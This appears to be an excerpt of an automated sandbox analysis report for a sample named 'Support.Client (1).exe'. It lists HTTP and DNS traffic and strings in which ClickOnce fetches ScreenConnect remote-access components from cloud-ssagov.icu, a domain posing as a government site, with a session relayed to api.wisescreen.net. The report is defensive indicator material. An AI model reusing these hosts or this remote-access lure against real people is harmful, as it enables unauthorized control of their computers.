                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: cloud-ssagov.icu
                  Source: global trafficDNS traffic detected: DNS query: api.wisescreen.net
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD4.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloud-ssagov.icu
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: svchost.exe, 00000005.00000002.2933943783.00000289A7861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCer
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000001.00000002.2548512537.000002CAF4DA9000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2548284901.000002CAF4D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab=
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2548849824.000002CAF4E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?409e66e
                  Source: svchost.exe, 00000005.00000003.1679655637.00000289A76C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 00000005.00000003.1679655637.00000289A76C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 00000005.00000003.1679655637.00000289A76C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 00000005.00000003.1679655637.00000289A76FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert4.
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2933982070.00000000024AB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/
                  Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: dfsvc.exe, 00000001.00000002.2548284901.000002CAF4D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.a
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA70F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA87A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA607000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Cli
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, 4G48BYOD.log.1.drString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio
                  Source: dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1967265538.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application34e089
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application=
                  Source: Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?-N
                  Source: 4G48BYOD.log.1.drString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net
                  Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationDXND
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationND
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDlz
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationO
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationQ4.XND
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationation
                  Source: dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationb01mv2)http0
                  Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationg
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationime9Zz
                  Source: dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationstem.Drawing%%4
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.2548893914.000002CAF4E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll3p
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, 4G48BYOD.log.1.drString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest4L
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll3
                  Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlln
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll;
                  Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllK
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Win
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.confige
                  Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configo
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e
